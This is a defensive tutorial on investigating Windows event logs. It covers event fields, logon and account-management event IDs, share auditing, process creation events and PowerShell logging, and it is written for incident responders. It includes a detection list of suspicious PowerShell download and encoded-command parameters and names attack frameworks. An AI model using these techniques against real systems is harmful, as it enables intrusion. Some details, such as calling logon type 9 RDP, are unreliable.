Windows Event

Investigation

By Ibrahim Saleh
 Windows Event

Modern Windows systems can log vast amounts of

information with minimal system impact.
With the corresponding decrease in the price of storage
media, excuses to not enable and retain these critical pieces
of evidence simply don’t stand up to scrutiny.
Configuring adequate logging on Windows systems, and
ideally aggregating those logs into a SIEM or other log
aggregator, is a critical step toward ensuring that your
environment is able to support an effective incident
response.

Windows event stored in the

%SystemRoot%\System32\winevt\logs directory by default
in the binary XML Windows Event Logging format,
designated by the .evtx extension.
Logs can also be stored remotely using log subscriptions.

Events have several fields:

1. Log name: The name of the Event Log where the event is stored.
2. Source: source generate event such as Microsoft component,
application,…
3. Event ID: code assign to each type, let you know what this event is.

1
4. Login ID: unique number for every logon session, used to trace user
when he logon until logoff.
5. User: the user context that the source was running as when it logged
the event. Note that this field often indicates “System” or a user that is
not the cause of the event being recorded.
6. Logged: local timestamp.
7. Task category: assign by the source that generate the event.
8. Description: A text block where additional information specific to the
event being logged is recorded.

Windows Event Types

Windows event have several types but there three main

types:
 Security Events: this log file includes record for all user activity
like: logon, login validation, object access, account management,
privilege use, and process tracking events.
 System Events: more important to system admins to troubleshoot
and diagnose system problems because it include events like: system
startup and shutdown, service status.
 Application Events: The application event log type contains
events logged by any application configured to store its logs in a
Windows application log file. Such configurations can be determined
by the developers during application development. The application
logs may contain event logs generated from applications such as the
antivirus or a database.
 There are many Events type such as PowerShell, RDP,
MWI, and Scheduled tasks

2
 Account management and login

Account Logon is the Microsoft term for authentication.

Logon is the term used to refer to an account gaining access
to a resource. Both Account Logon and Logon events will be
recorded in the Security event log. Account logon of domain
accounts is performed by a domain controller within a
Windows network. Account logon events will be logged by
the system that performs the authentication.
Windows Accounts can be:
 Local Account
 Domain User Account
 Default Local System Account:
(1) System: Is the most powerful account, has complete control over the system
and can access all resources and objects.
(2) Network Service: limited privileges, used by specific Windows services
and processes to authenticate over the network (allowed to present the
computer’s credentials to remote servers).
(3) Local Service: Similar to the NETWORK SERVICE account, Put not use
creds use null session to remote access.
(4) <Computer Name>$: Created when a Windows computer is joined to a
domain environment, is used to authenticate the computer to the domain and
allow the computer to access domain resources such as shared folders,
printers, and other network resources and administrators to manage their
computer’s settings and configuration centrally.
(5) Anonymous Logon: This account is used for null session communications,
for network communications, without the need to provide explicit
credentials, this account can be used to enumerate account information,
security policy, registry data, and network shares.

3
Security Windows Events Types:
1) Logon Success:
a) Event ID: 4624
b) Subject: Details of the account that requested the logon, not the user
who logged on, For Event ID 4624, the values of the Subject section are
usually empty and not useful.
c) Logon Type: describe the way used to logon, logon type(2) for
interactive logon (using keyboard), logon type(3) for remote logon,
logon type (9) for RDP logon
d) New Logon: User who logged in the system
e) Process Information: This section includes information about the
Windows process that initiated the logon activity.
f) Network Information: Details for Who Connect to this machine
Remote if user login in this PC Local This field empty, Useful for LTM.

2) Administrative Logon: special privilege

a) Event ID: 4672
b) Contains information about the administrative privilege
account and contains information about the administrative
privileges that the account has.
c) Note: when Admin account logon two event will generate(4624
for logon success, 4672 for admin logon)

4
3) Logon Failed:
a) Event ID: 4625
b) Contains two important fields:
 Status: indicates the overall result of the logon attempt, you can take this
hex value and search to know what is mean.
 Sub-Status: provides more detailed information about the reason for the
logon failure. It gives additional context to the "Status" field.
 When you see a lot of login failure, keep your mind this is brute
force attack or password spraying, you can specify which one by
look in status and sub-status.

4) Tracking Session: using login ID we can trace all user activity and to
determine the length of a session.

5) Account Management: Windows create events for create account,

delete, disable, able or modified. This common Account management event
ID:
a) Create User Account: 4720
b) User Account Enable: 4722
c) Delete User Account: 4726
d) Disable User Account: 4725
Note: use pervious events to detect persistence in the compromised
environment by creating new accounts, Attacker may create a new account
and add it to a high-privilege group.

6) Group Management: windows create events for create Group,

group modified, add user to group or removed. This common Group
management event ID:
a) Create Local Group: 4731
b) Delete Local Group: 4734
c) Create Global Group: 4727
5
 d) Delete Global Group: 4730
e) Add User to Local Group: 4732
f) Remove User from Local Group: 4733
g) Add User to Global Group: 4728
h) Remove User from Global Group: 4729

7) Account Validation: DC or Local System [sam] Validate Creds from

NTLM, Kerberos. Related to auth protocols.
Domain account authentications, the domain controller serves as the
authentication server and logs the login validation events.
Event ID related:
a) Records both successful and failed attempts when NTLM
protocol is used: 4776
b) Succeeded TGT: 4768
c) Succeeded service ticket: 4769
d) Pre-authentication failures, mean DC failed to validate the
provided credentials, So DC won’t grant TGT or Ticket
Granting Service (TGS) tickets: 4771

6
 Network Shared Object

Shared object refer to a shared folder or network share. This is

a directory or storage location on a computer that is shared
with other users over a network. Users with the appropriate
permissions can access and interact with the contents of the
shared folder.

Attackers frequently leverage valid credentials to remotely

access data through user created or administrative shares.

Doing so will generate Account Logon events as mentioned

above, but additional logging can also generate by enabled in
the Group Policy Management Console by navigating to
Computer Configuration -> Policies -> Windows Settings ->
Security Settings -> Advanced Audit Policy Configuration ->
Audit Policies -> Object Access -> Audit File Share. Once
enabled, the following Event IDs will be logged in the Security
Log:
o Event ID (5140): A network shared Data was accessed, but this
event don’t show which file that accessed. So, large amount of this
event means there is something suspicious.
o Event ID (5142): A network share object was added
o Event ID (5143): A network share object was modified
o Event ID (5144): A network share object was deleted
o Event ID (5145): A network share object was checked to see
whether client can be granted desired access. Failure is only
logged if the permission is denied at the file share level. If
permission is denied at the NTFS level then no entry is recorded.
Attacker use shared object to steal sensitive data or inject
malicious code. So, ensure that access control and
permission are placed.

7
 Windows Process and Related Events

Windows Process are programs running in the background carrying out

Windows operations and program or application execution on a Windows
operating system.
Each process has own memory space and resource.
Each process has many attributes like name, ID, path, command line and
parent process.

Windows has many process types, we can explain a little of them:

i) System:
o Definition: A kernel-mode process
o Process Name: System
o Process Path: N/A
o Username: System
o Parent Process: N/A
ii) Windows initialization(wininit.exe):
o Definition: The process that represents session 0 and is responsible
for initializing the Service Control Manager (services.exe), and the
Local Security Authority process (lsass.exe).
o Process Name: wininit.exe
o Process Path: %Systemroot%\System32\wininit.exe
o Username: SYSTEM
o Parent Process: N/A (created by an smss.exe instance but it does not
appear as a parent process in any analysis tool)

iii) Service Host (svchost.exe):

o Definition: Running and hosting service DLLs, There are multiple
instances of svchost.exe, each instance uses the unique “-k” parameter
in the command-line.
o Process Name: svchost.exe
o Process Path: %Systemroot%\System32\svchost.exe

8
 o Username: SYSTEM, LOCAL SERVICE, or NETWORK
SERVICE
o Parent Process: services.exe
There are a lot of process you can read more in this article

Windows process logged in two Events:

1) Event ID (4688):
o Records every process creation activity and Attributes, contains very
useful information about the username, process name, process path, and
parent process.
o Creator Subject filed: Information about the user and login session
that initiated the newly created process, Creator Subject as well as the
owner of the parent process that created the new process.
o Target Subject field: This section provides information about the user
who owns the newly created process and whose context the process runs
under, as well as the login session associated with the process.
o Process Information field: Contain new process ID, new process name,
token Elevation type, mandatory Labe, creator process ID, creator process
name, and process command line.

Note: Token Elevation Type indicates the type of token that was assigned to
the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full
token is only used if User Account Control is disabled or if the user is the built-
in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An
elevated token is used when User Account Control is enabled and the user
chooses to start the program using Run as administrator. An elevated token is
also used when an application is configured to always require administrative
privilege or to always require maximum privilege, and the user is a member of
the Administrators group.
Type 3 is a limited token with administrative privileges removed and
administrative groups disabled. The limited token is used when User Account
Control is enabled, the application does not require administrative privilege,
and the user does not choose to start the program using Run as administrator.

9
 2) Event ID (4689):
o Records every process exit activity Attributes
o Contain Subject, and Process information
o We can link 4688 and 4689 to make full view about process

Now, how to detect Suspicious Process:

I. Most attacker hiding malicious process with name similar to the
windows process names, So check if the name is correct or not
II. LOTL Tools: (Living off the land) attacker depend on legitimate
software and binaries available like Powershell.exe, cmd.exe, reg.exe,
Rundll32.exe, So check command line and behavior of process
III. Suspicious process-child process: attacker use legal process but with
suspicious parent process, by your knowledge about process you can
detect process with suspicious parent process.
IV. Suspicious Process Path: by your knowledge about process you know
what the normal path of each process is. So, you can detect this.

10
 PowerShell Events

PowerShell is designed for system administrators as it is a very

powerful tool that allows you to control and manage almost the
entire system with secure remote capabilities.
PowerShell extended its functionality by depending on cmdlets
(pronounced command-lets), which are collections of specific
commands allowing PowerShell users to conduct specific tasks,
such as remote to another system, display processes, and more.
Attacker use PowerShell because:
o It is installed and whitelisted by default on all Windows operating
systems.
o It generates few digital artifacts.
o It provides remote access capabilities over an encrypted channel.
o A growing community exists with available PowerShell penetration
scripts ready to use.
o Several attack and post-exploitation frameworks built on PowerShell
exist and are available for everyone to use, such as Nishang,
PowerSploit, Empire, and WinEnum.

PowerShell has two Log File:

o Event ID (800): Records any PowerShell command executions
made through the PowerShell console.
This logging type is enabled by default and generated by all
PowerShell versions.
PSReadLine: Feature to save every PowerShell Command Run
in machine in file
C:\Users[USERNAME]\AppData\Roaming\Microsoft\Windows
\PowerShell\PSReadLine. As history Transcripts: Feature to
track the input and output of PowerShell sessions. Transcripts
feature is not enabled by default.
11
 o Event ID (4103) and (4104):
(i) Event ID (4103): Logs the executed modules and cmdlets.

(ii) Event ID (4104): Records the executed PowerShell script block

contents on first execution.

PowerShell Attacks:
o Fileless PowerShell Malware: is a type of malicious
software that leverages PowerShell to carry out malicious
activities without writing traditional malware files to the
system's disk. Instead of relying on executable files that are
stored on disk, fileless malware operates in memory, making it
more challenging to detect by traditional antivirus solutions.
You can detect this by reviewing Event ID 4104
o Suspicious PowerShell Command: DownloadFile, -
ExecutionPolicy OR -ep, -EncodedCommand, OR -e OR -enc,
Invoke-Command, Enter-PSSession, Invoke-webRequest

12